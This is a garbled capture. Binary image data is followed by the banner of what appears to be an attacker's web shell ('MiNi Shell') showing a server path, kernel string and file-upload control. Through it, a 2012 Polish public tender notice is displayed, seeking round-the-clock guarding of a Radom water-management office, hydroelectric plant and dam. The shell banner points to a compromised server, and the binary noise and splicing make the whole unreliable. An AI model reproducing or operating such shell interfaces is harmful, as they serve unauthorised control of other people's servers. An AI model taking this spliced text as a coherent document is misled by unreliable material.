JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121220/522628-N-2012.html

<p class="kh_header"><b>Radom: Świadczenie usług w zakresie pełnienia całodobowej ochrony mienia 
dla Oddziału w Radomiu WZMiUW w Warszawie</b><br>
<b>Numer ogłoszenia: 522628 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Warszawie Oddział w Radomiu , ul. Wernera 4a, 26-600 Radom, woj. mazowieckie, tel. 048 3626138, faks 048 3624453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wzmiuw.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie pełnienia całodobowej ochrony mienia 
dla Oddziału w Radomiu WZMiUW w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia jest świadczenie na rzecz Oddziału w Radomiu WZMiUW w Warszawie całodobowej ochrony  mienia należącego do Zamawiającego w ramach pięciu obiektów, na terenie trzech posterunków stałych:<br/>
I posterunek, jeden obiekt: Budynek biurowy Oddziału WZMiUW w Radomiu przy ul. Wernera 4a wraz z przyległym terenem.
II posterunek: Budynek zaplecza eksploatacyjnego w Domaniowie oraz ośrodek wypoczynkowo - szkoleniowy z domkami letniskowymi, Wólka Domaniowska27, gm. Przytyk wraz z przyległym terenem.
W skład drugiego posterunku wchodzą dwa obiekty:
I obiekt: Budynek Zaplecza Eksploatacyjnego w Domaniowie - część podlegająca wynajmowi oraz ośrodek wypoczynkowo - szkoleniowy z domkami letniskowymi wraz z przyległym terenem
II obiekt: Budynek Zaplecza Eksploatacyjnego w Domaniowie - część biurowa  wraz z przyległym terenem.
III posterunek: Budynek usługowy elektrowni wodnej wraz z urządzeniami melioracji podstawowych, Wólka Domaniowska 27 gm. Przytyk.
W skład trzeciego  posterunku wchodzą dwa obiekty:
I obiekt: Elektrownia wodna wraz z budynkiem usługowym elektrowni i przyległym terenem.
II obiekt: Kompleks wodny Domaniów - urządzenia melioracji podstawowych obejmujący:
1) zaporę czołową wraz z budowlą upustowo - przelewową
2) zapory boczne i stacje pomp Konary i Brudnów
3) czaszę zbiornika ze szczególnym nadzorem pasa 30m powyżej budowli upustowo - przelewowej w obszarze oznaczonym znakami ostrzegawczymi
4) pomost cumowniczy wraz z obiektami pływającymi.
<br/>
Szczegółowy opis zamówienia i zakres świadczonych usług:
Przedmiotem Zamówienia jest świadczenie na rzecz Oddziału w Radomiu WZMiUW
w Warszawie całodobowej ochrony  mienia należącego do Zamawiającego w ramach pięciu obiektów, na terenie trzech posterunków stałych:  
I posterunek obejmujący jeden obiekt przy ul. Wernera 4a w Radomiu:
a. jeden stały całodobowy posterunek w obiekcie przez 7 dni w tygodniu,
b. strzeżenie powierzonego obiektu i mienia znajdującego się na terenie Zamawiającego, w tym przed kradzieżą i kradzieżą z włamaniem,
c. patrolowanie całości obiektu,
d. dokonywanie kontroli zamknięcia pomieszczeń i okien po godzinach pracy użytkowników oraz wygaszanie zbędnego oświetlenia i sprawdzanie, czy pozostawione zostały
w bezpiecznym stanie,
e. bieżąca obsługa systemu alarmowego i telewizji przemysłowej,
f. zgłaszanie wszelkich uwag i nieprawidłowości oraz zdarzeń, zniszczeń i interwencji,
g. podejmowanie niezbędnych działań w razie zagrożenia bezpieczeństwa lub naruszenia po-rządku,
h. monitorowanie obiektu oraz bieżąca obsługa systemu alarmowego i telewizji przemysłowej,
i. natychmiastowa reakcja i nawiązanie współpracy z odpowiednimi służbami tj. Policją, Strażą Miejską, Strażą Pożarną, Pogotowiem Ratunkowym i in. w przypadku wystąpienia zdarzeń wymagających interwencji z zewnątrz,
j. pełna współpraca i własna łączność pracowników ochrony wewnętrznej i zewnętrznej oraz możliwość szybkiego wsparcia przez grupy interwencyjne,
k. kontrola wstępu osób i pojazdów wjeżdżających na teren obiektu, otwieranie i zamykanie bramy wjazdowej,
l. prowadzenie dokumentacji dot. pełnienia służby oraz ewidencjonowanie wejść i wyjść pracowników urzędu i osób trzecich w godzinach pozaurzędowych tj. od 1600 do 700,
m. udzielanie informacji dotyczących miejsca załatwienia sprawy w urzędzie,
n. przyjmowanie, wydawanie i przechowywanie kluczy do pomieszczeń biurowych a także przekazywanie korespondencji osobom uprawnionym,
o. doręczanie korespondencji do Urzędu Pocztowego w godz. 1430 - 1500,
p. wykonywanie drobnych prac naprawczych w obiekcie oraz pomoc w przenoszeniu materia-łów,
q. utrzymywanie ładu i porządku na terenie objętym ochroną, w tym sprzątanie chodników 
i placu (m.in. grabienie liści),
r. w okresie letnim koszenie trawy oraz dbanie o zieleń na placu,
s. w okresie zimowym odśnieżanie placu, chodnika i schodów zewnętrznych, posypywanie piaskiem, solą i usuwanie oblodzeń,

II posterunek: jeden stały, całodobowy posterunek przez 7 dni w tygodniu obejmujący dwa          
obiekty w Wólce Domaniowskiej 27, gm. Przytyk:
I obiekt:
a. całodobowe strzeżenie powierzonego obiektu i mienia znajdującego się na terenie Zamawiającego, w tym przed kradzieżą i kradzieżą z włamaniem,
b. patrolowanie całości obiektu,
c. monitorowanie obiektu oraz bieżąca obsługa systemu alarmowego i telewizji przemysłowej,
d. zgłaszanie wszelkich uwag i nieprawidłowości oraz zdarzeń, zniszczeń i interwencji,
e. podejmowanie niezbędnych działań w razie zagrożenia bezpieczeństwa lub naruszenia po-rządku,
f. natychmiastowa reakcja i nawiązanie współpracy z odpowiednimi służbami tj. Policją, Strażą Pożarną, Pogotowiem Ratunkowym i in. w przypadku wystąpienia zdarzeń wymagających interwencji z zewnątrz,
g. pełna współpraca i własna łączność pracowników ochrony wewnętrznej i zewnętrznej oraz możliwość szybkiego wsparcia przez grupy interwencyjne,
h. kontrola wstępu osób na teren obiektu,
i. utrzymywanie ładu i porządku na terenie objętym ochroną (m.in. odśnieżanie w okresie zi-mowym),
j. prowadzenie dokumentacji dot. pełnienia służby,
k. ewidencjonowanie i wydawanie kluczy do pokoi gościnnych, sali konferencyjnej, zaplecza kuchennego, domków i przyczepy sanitarnej, po uprzednim uzgodnieniu z pracownikiem administracyjnym oraz zgodnie z obowiązującymi regulaminami.
II obiekt:
a. całodobowe strzeżenie powierzonego obiektu i mienia znajdującego się na terenie Zamawiającego, w tym przed kradzieżą i kradzieżą z włamaniem,
b. patrolowanie całości obiektu, 
c. monitorowanie obiektu oraz bieżąca obsługa systemu alarmowego i telewizji przemysłowej
w ramach usług świadczonych na obiekcie I,
d. zgłaszanie wszelkich uwag i nieprawidłowości oraz zdarzeń, zniszczeń i interwencji,
e. podejmowanie niezbędnych działań w razie zagrożenia bezpieczeństwa lub naruszenia po-rządku,
f. natychmiastowa reakcja i nawiązanie współpracy z odpowiednimi służbami tj. Policją, Strażą Pożarną, Pogotowiem Ratunkowym i in. w przypadku wystąpienia zdarzeń wymagających interwencji z zewnątrz,
g. pełna współpraca i własna łączność pracowników ochrony wewnętrznej i zewnętrznej oraz możliwość szybkiego wsparcia przez grupy interwencyjne,
h. kontrola wstępu osób na teren obiektu,
i. utrzymywanie ładu i porządku na terenie objętym ochroną (m.in. odśnieżanie w okresie zi-mowym),
j. prowadzenie dokumentacji dot. pełnienia służby w ramach usług świadczonych na obiekcie I.

III posterunek: jeden stały, całodobowy posterunek przez 7 dni w tygodniu obejmujący dwa 
obiekty w Wólce Domaniowskiej 27, gm. Przytyk:
I obiekt:
a. całodobowe strzeżenie powierzonego obiektu i mienia znajdującego się na terenie Zamawiającego, w tym przed kradzieżą i kradzieżą z włamaniem,
b. patrolowanie terenu Zamawiającego poprzez monitoring oraz dokonywanie obchodów. 
Po godzinie 1500 szczególnie wzmożone kontrole i obchody przydzielonego terenu 
w nieregularnych odstępach czasu,
c. monitorowanie obiektu oraz bieżąca obsługa systemu alarmowego i telewizji przemysłowej,
d. zgłaszanie wszelkich uwag i nieprawidłowości oraz zdarzeń, zniszczeń i interwencji,
e. podejmowanie niezbędnych działań w razie zagrożenia bezpieczeństwa lub naruszenia po-rządku,
f. natychmiastowa reakcja i nawiązanie współpracy z odpowiednimi służbami tj. Policją, Strażą Pożarną, Pogotowiem Ratunkowym i in. w przypadku wystąpienia zdarzeń wymagających interwencji z zewnątrz,
g. pełna współpraca i własna łączność pracowników ochrony wewnętrznej i zewnętrznej oraz możliwość szybkiego wsparcia przez grupy interwencyjne,
h. kontrola wstępu osób na teren objęty zakazem,
i. utrzymywanie ładu i porządku na terenie objętym ochroną (m.in. odśnieżanie),
j. prowadzenie dokumentacji dot. pełnienia służby.
II  obiekt:
a. patrolowanie terenu Zamawiającego poprzez monitoring oraz dokonywanie obchodów. 
Po godzinie 15:00 szczególnie wzmożone kontrole i obchody przydzielonego terenu 
w nieregularnych odstępach czasu,
b. monitorowanie obiektu,
c. zgłaszanie wszelkich uwag i nieprawidłowości oraz zdarzeń, zniszczeń i interwencji,
d. podejmowanie niezbędnych działań w razie zagrożenia bezpieczeństwa lub naruszenia po-rządku,
e. natychmiastowa reakcja i nawiązanie współpracy z odpowiednimi służbami tj. Policją, Strażą Pożarną, Pogotowiem Ratunkowym i in. w przypadku wystąpienia zdarzeń wymagających interwencji z zewnątrz,
f. pełna współpraca i własna łączność pracowników ochrony wewnętrznej i zewnętrznej oraz możliwość szybkiego wsparcia przez grupy interwencyjne,
g. prowadzenie dokumentacji dot. pełnienia służby.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta powinna być zabezpieczona wadium w wysokości 3 500,00 zł (słownie: trzy tysiące pięćset złotych i 00/100).
Wadium należy wnieść przed upływem terminu składania ofert.
2. Wadium może być wniesione w formie:
- pieniężnej - przelewem na konto Oddziału WZMiUW w Radomiu w banku PeKaO S.A. Nr 18 1240 1789 1111 0010 1603 1257 przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego, po-twierdzi, że otrzymał taki przelew najpóźniej do godziny będącej upływem terminu składania ofert. Kopię przelewu należy załączyć do oferty. 
- poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancji bankowych,
- gwarancji ubezpieczeniowych, 
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Przedsiębiorczości (tekst jednolity Dz.U. z 9 marca 2007r. Nr 42, poz. 275 z późn. zm.).
Dokumenty potwierdzające złożenie wadium w innej formie niż pieniężna, winny być wystawione na WZMiUW w Warszawie ul. Ksawerów 8 i złożone przed upływem terminu składania ofert w oryginale w siedzibie Oddziału WZMiUW - pokój 111, a w ofercie należy umieścić poświadczoną za zgodność kserokopię</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony o ile wykonawca wykaże, że posiada koncesję wydaną przez Ministra właściwego do Spraw Wewnętrznych na wykonywanie działalności gospodarczej w zakresie usług ochrony mienia wydaną na podstawie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r., Nr 145,poz.1221 z późn.zm.).
Na potwierdzenie spełnienia przez Wykonawcę tego warunku należy przedłożyć dokument określony w pkt X.2 niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonawca zrealizował co najmniej 1 usługę ochrony mienia trwającą minimum 12 kolejnych miesięcy o wartości co najmniej 140 000,00 zł.
Zamawiający dopuszcza sumowanie zamówień o mniejszej wartości, jednak co najmniej jedno zamówienie musi mieć wartość większą lub równą 70 000,00 zł.
Warunek wiedzy i doświadczenia oceniony zostanie na podstawie wykazu wykonanych zamówień z podaniem ich rodzaju i wartości, daty i miejsca wykonania (formularz nr 3 do SIWZ) oraz załączeniem dokumentu potwierdzającego, że usługi zostały prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien także dysponować niezbędnym sprzętem do wykonania zamówienia.
W przypadku nie dysponowania takimi osobami lub sprzętem, należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób lub potencjału technicznego zdolnych do wykonania zamówienia. 
Na potwierdzenie spełnienia przez Wykonawcę tego warunku należy przedłożyć dokument określony w rozdziale X. pkt 1 niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca dysponuje lub będzie dysponował min. 1 pracownikiem posiadającym licencję pracownika ochrony fizycznej 
I stopnia sprawującym nadzór nad pracownikami nie posiadającymi licencji oraz dysponuje zorganizowaną i zmotoryzowaną grupą interwencyjną. Wykonawca powinien także dysponować niezbędnym sprzętem do wykonania zamówienia.
W przypadku nie dysponowania takimi osobami lub sprzętem, należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób lub potencjału technicznego zdolnych do wykonania zamówienia. 
Na potwierdzenie spełnienia przez Wykonawcę tego warunku należy przedłożyć dokument określony w rozdziale X. pkt 1 i 4 niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla spełnienia powyższego warunku wykonawca:<br/>
- musi posiadać środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 30 000,00 zł,<br/>
- musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/>
Ocena spełniania tych warunków zostanie dokonana na podstawie złożonego dokumentu wymienionego w pkt. X.4 i 5 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Niedopuszczalna jest, pod rygorem nieważności, istotna zmiana postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia zmian wynika z okoliczności, o których mowa w ust. 2 niniejszego paragrafu.<br/> 
2. Strony mogą zmienić postanowienia zawartej umowy jeżeli zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można było uniknąć ani im zapobiec, a w szczególności zmiany mogą dotyczyć:<br/> 
- terminu realizacji umowy,<br/>
- zakresu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wzmiuw.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Warszawie Oddział w Radomiu ul. Wernera 4a 26-600 Radom - pokój nr 6.</p>
